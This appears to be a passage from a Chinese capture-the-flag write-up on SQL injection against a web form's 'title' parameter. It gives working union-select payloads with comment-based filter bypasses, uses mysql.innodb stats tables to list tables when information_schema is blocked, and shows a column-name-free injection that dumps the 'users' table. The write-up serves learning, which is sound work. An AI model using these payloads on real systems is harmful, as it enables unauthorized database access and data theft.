title=1'union/**/select/**/
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'2&content=32131&ac=add
得到database是web1。
⾛后⾯的流程也出现问题了。发现information_schema表被过滤了。
所以使⽤:mysql.innodb_table_stats 。
title=1'union/**/select/**/1,group_concat(table_name),database(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/from/**/mysql.innodb_index_stats/**/where/**/database_name="web1"'&content=32131&ac=add
获得表名
接下来要学习新的东⻄:⽆列名注⼊
⽐如我输⼊下⾯的内容,可以看到我的内容全部综合到了如下的表中。
随后把刚刚查询的内容当作⼀个table即可:
因此构造如下输⼊:
title=1'union/**/select/**/1,(select/**/group_concat(b,c)/**/from/**/(select/**/1/**/as/**/a,2/**/as/**/b,3/**/
as/**/c/**/union/**/select/**/*/**/from/**/
users)newtabble),database(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/'&content=32131&ac=add